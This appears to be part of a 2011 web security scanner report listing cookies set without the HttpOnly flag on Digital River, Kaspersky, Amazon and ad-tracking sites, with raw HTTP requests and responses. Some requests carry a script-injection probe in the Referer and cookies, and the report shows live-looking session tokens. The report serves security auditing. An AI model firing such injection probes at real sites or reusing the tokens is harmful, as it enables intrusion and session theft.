10.1. http://corporate.digitalriver.com/store/digriv/en_US/DisplayPage/ThemeID.16015700/id.TopHeaderPopUpCssStylePage previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://corporate.digitalriver.com
Path:	/store/digriv/en_US/DisplayPage/ThemeID.16015700/id.TopHeaderPopUpCssStylePage

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ORA_WX_SESSION="10.1.2.212:260-0#0"; path=/
JSESSIONID=67095CF4E57BB1931F717EC7D3CE6B56; path=/
VISITOR_ID=971D4E8DFAED43674226FBB5874B1E24DDCD475DE29678F5; expires=Mon, 03-Sep-2012 20:10:59 GMT; path=/

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /store/digriv/en_US/DisplayPage/ThemeID.16015700/id.TopHeaderPopUpCssStylePage HTTP/1.1
Host: corporate.digitalriver.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
Referer: http://corporate.digitalriver.com/store/digriv/html/pbPage.Homepage?resid=TmOIUAoBAlUAAARDMJwAAAAN&rests=1315145806740&da9c3--%3E%3Cscript%3Eprompt(document.location)%3C/script%3Edd29a7ec5c0=1
Cookie: op537homegum=a00602v02x278vq07r1n88278vq08j393ee8a; op393dr_homepage_demo1gum=a04e07i0a12794q0634yf92b6; op393dr_homepage_demo1liid=a04e07i0a12794q0634yf92b6; __utma=94877326.951308031.1315146138.1315146138.1315146138.1; __utmb=94877326.1.10.1315146138; __utmc=94877326; __utmz=94877326.1315146138.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __utma=94877326.951308031.1315146138.1315146138.1315146138.1; __utmb=94877326.2.10.1315146138; __utmc=94877326; __utmz=94877326.1315146138.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; BIGipServerp-drh-dc1pod5-pool1-active=3556901130.260.0000; fcOOS=fcOptOutChip=undefined; fcC=X=C781953390&Y=1315146141467&FV=-1&H=1315146141029&Z=0&E=2283193&F=0&fcTHR=www.digitalriver.com}www.drcorporate.com,store.digitalriver.com}www.store-dr.com; fcP=C=0&T=1315146141467&DTO=1315146141029&U=781953390&V=1315146141029; fcR=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue; fcPT=http%3A//corporate.digitalriver.com/store/digriv/html/pbPage.Homepage%3Fresid%3DTmOIUAoBAlUAAARDMJwAAAAN%26rests%3D1315145806740%26da9c3--%253E%253Cscript%253Eprompt%28document.location%29%253C/script%253Edd29a7ec5c0%3D1

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/css;charset=UTF-8
Set-Cookie: ORA_WX_SESSION="10.1.2.212:260-0#0"; path=/
Set-Cookie: JSESSIONID=67095CF4E57BB1931F717EC7D3CE6B56; path=/
Set-Cookie: VISITOR_ID=971D4E8DFAED43674226FBB5874B1E24DDCD475DE29678F5; expires=Mon, 03-Sep-2012 20:10:59 GMT; path=/
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=23859686939,0)
Date: Sun, 04 Sep 2011 14:21:47 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc1app56
Content-Length: 6619


<!--!esi:include src="/store?Action=DisplayESIPage&Currency=USD&Env=BASE&Locale=en_US&SiteID=digriv&ThemeID=16015700&ceid=175581900
...[SNIP]...

10.2. http://corporate.digitalriver.com/store/driv/en_US/ContentTheme/pbPage.Homepage/sectionName.home previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://corporate.digitalriver.com
Path:	/store/driv/en_US/ContentTheme/pbPage.Homepage/sectionName.home

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ORA_WX_SESSION="10.1.2.73:260-0#0"; path=/
JSESSIONID=86C536518740DCEA6999FE20F5D60BBA; path=/

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /store/driv/en_US/ContentTheme/pbPage.Homepage/sectionName.home HTTP/1.1
Host: corporate.digitalriver.com
Proxy-Connection: keep-alive
Referer: http://www.digitalriver.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: op537homegum=a00602v02x278vq07m15wd278vr08s2xm1011; op646kaspersky_us_storepageliid=a01603h0892794r05t3df82794r05y3aoe389

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: ORA_WX_SESSION="10.1.2.73:260-0#0"; path=/
Set-Cookie: JSESSIONID=86C536518740DCEA6999FE20F5D60BBA; path=/
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=23859425004,0)
Date: Sun, 04 Sep 2011 14:17:33 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc1app58
Content-Length: 7656

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<!--!esi:include src="/esi?Sit
...[SNIP]...

10.3. http://event.adxpose.com/event.flow previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://event.adxpose.com
Path:	/event.flow

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=BDE79DB1AD855581586307166C66D372; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /event.flow HTTP/1.1
Host: event.adxpose.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=BDE79DB1AD855581586307166C66D372; Path=/
Cache-Control: no-store
Content-Type: text/html;charset=UTF-8
Content-Length: 0
Date: Sun, 04 Sep 2011 14:00:15 GMT
Connection: close

10.4. http://forum.kaspersky.com/index.php previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://forum.kaspersky.com
Path:	/index.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

session_id=82c6300bfd526a46875731ac58df8e9e; path=/
topicsread=a%3A1%3A%7Bi%3A211812%3Bi%3A1315145373%3B%7D; path=/
modpids=deleted; expires=Sat, 04 Sep 2010 14:09:32 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /index.php?s=82c6300bfd526a46875731ac58df8e9e&showtopic=211812 HTTP/1.1
Host: forum.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://forum.kaspersky.com/index.php?showforum=5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; ev5=far%2Bhelp%2Bvirus; op646kaspersky_us_storepagegum=a01603h0892794r05t3df82794r05y3aoe389; session_id=82c6300bfd526a46875731ac58df8e9e; forum_read=a%3A1%3A%7Bi%3A5%3Bi%3A1315144636%3B%7D; __utma=134438630.1937195929.1315144680.1315144680.1315144680.1; __utmb=134438630.1.10.1315144680; __utmc=134438630; __utmz=134438630.1315144680.1.1.utmcsr=support.kasperskyamericas.com|utmccn=(referral)|utmcmd=referral|utmcct=/corporate/contact-information; s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315144595.2; __utmb=205612169.4.9.1315144595; __utmc=205612169; __utmz=205612169.1315144595.2.2.utmcsr=usa.kaspersky.com|utmccn=(referral)|utmcmd=referral|utmcct=/about-us; gpv_pageName=Products%20%26%20Services%20%7C%20Home%20Computer%20Security%20%7C%20PURE; intcamp=INT1673886; s_nr=1315144912919-Repeat; s_sq=kaspersky-usa%3D%2526pid%253DProducts%252520%252526%252520Services%252520%25257C%252520Home%252520Computer%252520Security%252520%25257C%252520PURE%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fproducts-services%25252Fhome-computer-security%25252Fpure%25253FICID%25253DINT1673886%252523BVRRWidgetID%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 04 Sep 2011 14:09:34 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Set-Cookie: session_id=82c6300bfd526a46875731ac58df8e9e; path=/
Set-Cookie: topicsread=a%3A1%3A%7Bi%3A211812%3Bi%3A1315145373%3B%7D; path=/
Set-Cookie: modpids=deleted; expires=Sat, 04 Sep 2010 14:09:32 GMT; path=/
Vary: Accept-Encoding
Content-Length: 50657

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<!
...[SNIP]...

10.5. http://forum.kaspersky.com/index.php previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://forum.kaspersky.com
Path:	/index.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

session_id=82c6300bfd526a46875731ac58df8e9e; path=/
forum_read=a%3A1%3A%7Bi%3A5%3Bi%3A1315144835%3B%7D; expires=Mon, 03 Sep 2012 14:00:35 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /index.php?showforum=5 HTTP/1.1
Host: forum.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://support.kasperskyamericas.com/corporate/contact-information
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; ev5=far%2Bhelp%2Bvirus; op646kaspersky_us_storepagegum=a01603h0892794r05t3df82794r05y3aoe389; intcamp=INT1673886; s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315144595.2; __utmb=205612169.3.9.1315144595; __utmc=205612169; __utmz=205612169.1315144595.2.2.utmcsr=usa.kaspersky.com|utmccn=(referral)|utmcmd=referral|utmcct=/about-us; gpv_pageName=About%20Us%20%7C%20company%20overview%20%7C%20Contact%20Us; s_nr=1315144597879-Repeat; s_sq=kaspersky-usa%3D%2526pid%253DAbout%252520Us%252520%25257C%252520company%252520overview%252520%25257C%252520Contact%252520Us%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fsupport.kasperskyamericas.com%25252Fcorporate%25252Fcontact-information%25252520O%2526ot%253DA

Response

10.6. http://login.dotomi.com/ucm/UCMController previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://login.dotomi.com
Path:	/ucm/UCMController

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

DotomiSession_2399=2_273300890137713469$230600846273249123$2065492370$1315148282514; Domain=.dotomi.com; Path=/
DotomiUser=230600846273249123$0$2065492370; Domain=.dotomi.com; Expires=Tue, 03-Sep-2013 14:58:02 GMT; Path=/
DotomiNet=2$DjQqblZ1R3FBBWdeBwJ9XghHKDNEGQNECVltVlFLYHxnfAoMBQ9AVxZYERtFSlUCJiZWfWliVH5AeEoNYlsKA28BQgBweQRiUgRNUGBDBwEgEGR8AAEICEBeBAJWR0hCQ1tlY08oOycGGRA5AmtmXgQAdl0%3D; Domain=.dotomi.com; Expires=Tue, 03-Sep-2013 14:58:02 GMT; Path=/
DotomiRR2399=-1$3$0$; Domain=.dotomi.com; Expires=Mon, 05-Sep-2011 14:58:02 GMT; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.7. http://support.kasperskyamericas.com/corporate/contact-information%20O previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://support.kasperskyamericas.com
Path:	/corporate/contact-information%20O

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SESSdede027f997e7b165588bf3c431a00ec=q25voncnf657rngjhpsai5d5p6; expires=Tue, 27-Sep-2011 17:29:20 GMT; path=/; domain=.support.kasperskyamericas.com

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /corporate/contact-information%20O HTTP/1.1
Host: support.kasperskyamericas.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/about-us/contact-us
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 04 Sep 2011 13:56:00 GMT
Server: Apache
Set-Cookie: SESSdede027f997e7b165588bf3c431a00ec=q25voncnf657rngjhpsai5d5p6; expires=Tue, 27-Sep-2011 17:29:20 GMT; path=/; domain=.support.kasperskyamericas.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 13:56:00 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Location: http://support.kasperskyamericas.com/corporate/contact-information
Content-Length: 0
Content-Type: text/html; charset=utf-8

10.8. http://t2.trackalyzer.com/trackalyze.asp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://t2.trackalyzer.com
Path:	/trackalyze.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ASPSESSIONIDQATRQSTS=COFMNCCBFNILOGKEECDPEFNF; path=/
loop=http%3A%2F%2Fcorporate%2Edigitalriver%2Ecom%2Fstore%2Fdigriv%2Fhtml%2FpbPage%2EHomepage%3Fresid%3DTmOIUAoBAlUAAARDMJwAAAAN%26rests%3D1315145806740%26da9c3%2D%2D%253E%253Cscript%253Eprompt%28document%2Elocation%29%253C%2Fscript%253Edd29a7ec5c0%3D1; expires=Mon, 05-Sep-2011 07:00:00 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /trackalyze.asp?r=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&p=http%3A//corporate.digitalriver.com/store/digriv/html/pbPage.Homepage%3Fresid%3DTmOIUAoBAlUAAARDMJwAAAAN%26rests%3D1315145806740%26da9c3--%253E%253Cscript%253Eprompt%28document.location%29%253C/script%253Edd29a7ec5c0%3D1&i=19837 HTTP/1.1
Host: t2.trackalyzer.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://corporate.digitalriver.com/store/digriv/html/pbPage.Homepage?resid=TmOIUAoBAlUAAARDMJwAAAAN&rests=1315145806740&da9c3--%3E%3Cscript%3Eprompt(document.location)%3C/script%3Edd29a7ec5c0=1
Cookie: trackalyzer=283279514213070

Response

HTTP/1.1 302 Object moved
Date: Sun, 04 Sep 2011 14:21:36 GMT
Server: Microsoft-IIS/6.0
P3P: policyref="http://trackalyzer.com/w3c/p3p.xml", CP="NON DSP COR CURa OUR NOR"
Location: http://t2.trackalyzer.com/dot.gif
Content-Length: 154
Content-Type: text/html
Set-Cookie: loop=http%3A%2F%2Fcorporate%2Edigitalriver%2Ecom%2Fstore%2Fdigriv%2Fhtml%2FpbPage%2EHomepage%3Fresid%3DTmOIUAoBAlUAAARDMJwAAAAN%26rests%3D1315145806740%26da9c3%2D%2D%253E%253Cscript%253Eprompt%28document%2Elocation%29%253C%2Fscript%253Edd29a7ec5c0%3D1; expires=Mon, 05-Sep-2011 07:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDQATRQSTS=COFMNCCBFNILOGKEECDPEFNF; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://t2.trackalyzer.com/dot.gif">here</a>.</body>

10.9. http://www.amazon.com/s/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.amazon.com
Path:	/s/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
session-id=185-1916103-3839538; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
ubid-main=186-9518835-6308315; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /s/ HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.10. http://a.tribalfusion.com/i.cid previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/i.cid

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ANON_ID=OptOut; path=/; domain=.tribalfusion.com; expires=Wed, 01-Sep-2021 12:18:54 GMT;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.11. http://a.tribalfusion.com/z/i.cid previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/z/i.cid

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ANON_ID=ahnrXhm5abxmyuoKUgEQvvkBQJtx1GtCIWCHvZamdhCZbUrvYE571SqfjBjBKyMs4dQ0dG500G; path=/; domain=.tribalfusion.com; expires=Sat, 03-Dec-2011 12:19:22 GMT;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.12. http://action.media6degrees.com/orbserv/hbpix previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://action.media6degrees.com
Path:	/orbserv/hbpix

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

vstcnt=41al010r06458kv131p20220324e2od118e10624fj9y118e10q24t3e9118e10a23sti11hj10224mij2127p2062072; Domain=media6degrees.com; Expires=Fri, 02-Mar-2012 12:27:22 GMT; Path=/
clid=2lpgndm01170gl99ih0j0xqn1jck001c6v021102902; Domain=media6degrees.com; Expires=Fri, 02-Mar-2012 12:27:22 GMT; Path=/
sglst=41an0ai1020ag29x000th9x0094r0e044m9x008nc9x00dng9b106oo9x006op9b107239x00h939x00g0s9b10ebc9x00g0t9x000kn9x009rs9x00bo09x008219x004ry0609rr9b107249b10cwg9b10box9b10bny9b10fyt9b1; Domain=media6degrees.com; Expires=Fri, 02-Mar-2012 12:27:22 GMT; Path=/
rdrlst=40r1210lptjcn0000000g6v0213j3lpl77b000000126v02159ilpl77b000000126v021ax5lq7dnr000000046v021ax7lqt5nu000000036v020jv8lptjcn0000000g6v02163klptjcn0000000g6v021cxnlqt5nu000000036v020lw4lqt5nu000000036v0217gylqt5nu000000036v020znmlpl77b000000126v020p43lptjcn0000000g6v021203lq7dnr000000046v020caflpl77b000000126v021201lptjcn0000000g6v0200c5lpl77b000000126v020p46lptjcn0000000g6v021ar1lptjcn0000000g6v020h4hlq7dnr000000046v02196mlpl60r000000176v020h4glptjcn0000000g6v0215xylpl77b000000126v0207sylqt5nu000000036v0210polpl60i000000186v020hv1lptjcn0000000g6v020hv0lqt5nu000000036v0214p7lptjcn0000000g6v02; Domain=media6degrees.com; Expires=Fri, 02-Mar-2012 12:27:22 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.13. http://ad.yieldmanager.com/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.yieldmanager.com
Path:	/pixel

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

bh="b!!!##!!-O3!!!!#=3G@^!!Os7!!!!#=3G@^!!`4x!!!!$=3Ef#!!jBx!!!!#=2srH!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!#=3M*$!#2Rm!!!!#=3*$x!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8TD!!!!#=3*$x!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#RY.!!!!%=3H5P!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#]W%!!!!%=3H5P!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#tCn!!!!%=3H5P!#tK$!!!!%=3H5P!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*Q<!!!!%=3H5P!$*a0!!!!%=3H5P!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$/iQ!!!!%=3H5P!$0Ge!!!!#=3M*'!$1:.!!!!#=3!ea!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3jT!!!!%=3H5P!$3y-!!!!'=2v<]!$4ou!!!!%=3H5P!$5Nu!!!!%=3H5P!$5oO!!!!%=3H5P!$5qE!!!!%=3H5P!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$:Py!!!!%=3H5P!$<DI!!!!#=3G@^!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s@!!!!$=3H5P!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P"; path=/; expires=Tue, 03-Sep-2013 12:14:09 GMT
BX=ei08qcd75vc4d&b=3&s=8s&t=246; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pixel?id=1325214&t=2 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=dd24a7d4-d3d5-11e0-8d9f-78e7d1fad490&_hmacv=1&_salt=2478993672&_keyid=k1&_hmac=b96a3af4c1f9c52f33944d31e2827ff5a044729b; ih="b!!!!#!.`.U!!!!#=3H3k"; vuday1=Gf(n`!#nf>Z-B7g; bh="b!!!#!!!-O3!!!!#=3G@^!!Os7!!!!#=3G@^!!`4x!!!!$=3Ef#!!jBx!!!!#=2srH!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!#=3M*$!#2Rm!!!!#=3*$x!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8TD!!!!#=3*$x!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#RY.!!!!%=3H5P!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#]W%!!!!%=3H5P!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#tCn!!!!%=3H5P!#tK$!!!!%=3H5P!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*Q<!!!!%=3H5P!$*a0!!!!%=3H5P!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$/iQ!!!!%=3H5P!$1:.!!!!#=3!ea!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3jT!!!!%=3H5P!$3y-!!!!'=2v<]!$4ou!!!!%=3H5P!$5Nu!!!!%=3H5P!$5oO!!!!%=3H5P!$5qE!!!!%=3H5P!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$:Py!!!!%=3H5P!$<DI!!!!#=3G@^!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s@!!!!$=3H5P!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P"; BX=ei08qcd75vc4d&b=3&s=8s&t=246

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 12:14:09 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: 